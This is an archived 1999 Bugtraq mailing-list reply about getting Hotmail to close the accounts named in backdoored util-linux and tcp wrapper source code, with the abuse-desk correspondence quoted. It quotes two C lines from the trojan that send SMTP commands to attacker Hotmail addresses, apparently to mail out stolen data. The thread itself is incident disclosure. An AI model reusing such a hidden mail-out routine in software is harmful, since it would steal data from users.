[9268] in bugtraq
Re: Microsoft Hotmail
daemon@ATHENA.MIT.EDU (MaelstromNet Security)
Wed Jan 27 19:01:39 1999
Date: Tue, 26 Jan 1999 19:42:35 -0600
Reply-To: MaelstromNet Security <security@MAELSTROM.NET>
From: MaelstromNet Security <security@MAELSTROM.NET>
X-To: "Daniel P. Stasinski" <dannys@KAREMOR.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <36ADFD04.1FD6375D@karemor.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Odd, they told me they already closed it.
See attached...
>>From: <abuse@hotmail.com>
>>To: <security@maelstrom.net>
>>Subject: RE: CST204603ID - Re: util-linux compromised
>>Date: Mon, 25 Jan 1999 18:09:42 -0800
>>X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
>>
>>
>>Thank you for writing
>>
>>We have closed the account that you reported.
>>
>>Hotmail does not condone or support the sending of junk email (AKA "spam")
>>through our system. The Hotmail Terms of Services (TOS)
>>strictly forbids sending unsolicited email and we terminate all reported
>>accounts that are in violation of the TOS.
>>
>>We appreciate your mail alerting us to the spammer using our system. Our
>>ANTI-SPAM policy can be found at
>>http://www.hotmail.com/nospam.html
>>
>>
>>
>>
>>MSN Hotmail support
>>--- Original Message ---
>>From: security@maelstrom.net
>>To: abuse@css.one.microsoft.com
>>Sent: 1/24/99 7:34:12 PM
>>Subject: Re: util-linux compromised
>>
>>Greetings. It appears a user with a hotmail address has broken into a
>>major linux distribution site and replaced code with trojans. Could you
>>please lock down these addresses. Thanks.
>>
>>>> sleep(1);if (write(s,"MAIL FROM:<xul@hotmail.com>\n",28)
>><
>>0) exit(0);
>>>> if (write(s,"RCPT TO:<wlogain@hotmail.com>\n",30) < 0)
>>exit(0);
>>
>>>Approved-By: aleph1@UNDERGROUND.ORG
>>>X-Received: from listserv.funet.fi (listserv.funet.fi [128.214.248.27])
>>by
>>> blues.jpj.net (right/backatcha) with ESMTP id IAA02895 for
>>> <trevor@jpj.net>; Sun, 24 Jan 1999 08:32:37 -0500 (EST)
>>>X-Received: from vger.rutgers.edu ([128.6.190.2]:58960 "EHLO
>>vger.rutgers.edu"
>>> ident: "NO-IDENT-SERVICE[2]") by listserv.funet.fi with ESMTP
>>id
>>> <12518-10914>; Sun, 24 Jan 1999 15:25:56 +0200
>>>X-Received: by vger.rutgers.edu via listexpand id <154929-19608>; Sun, 24
>>Jan
>>> 1999 08:16:11 -0500
>>>X-Received: by vger.rutgers.edu id <154700-19607>; Sun, 24 Jan 1999
>>08:13:56
>>> -0500
>>>X-Received: from hera.cwi.nl ([192.16.191.1]:57613 "EHLO hera.cwi.nl"
>>ident:
>>> "SOCKWRITE-65") by vger.rutgers.edu with ESMTP id
>><153958-19607>;
>>> Sun, 24 Jan 1999 08:11:34 -0500
>>>X-Received: from ark.cwi.nl (ark.cwi.nl [192.16.191.66]) by hera.cwi.nl
>>with
>>> ESMTP id OAA15778 for ; S
>>
>>
>>
At 10:36 AM 1/26/99 -0700, Daniel P. Stasinski wrote:
>I contacted Microsoft/Hotmail asking them to close the account
>of that was listed in the backdoored tcp wrapper source code.
>I also forwarded the offending code.
>
>The word back from them is that they will not close it. Theft
>of passwords and hacking does not violate thier terms of
>service.
>
>Daniel
>--
>/\/ Daniel P. Stasinski /\/ Karemor International, Inc. /\/
>/\/ Software Engineer /\/ 2406 South 24th Street /\/
>/\/ dannys@karemor.com /\/ Phoenix, AZ 85034 /\/
>
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQA/AwUBNq5vCvCIdxKFpraAEQJGVACgvIhDyogyPhq2MQUFIwXMMTOdDeUAoLho
Qx0Zl25LPmqzInimPNYxGyxD
=sTBs
-----END PGP SIGNATURE-----
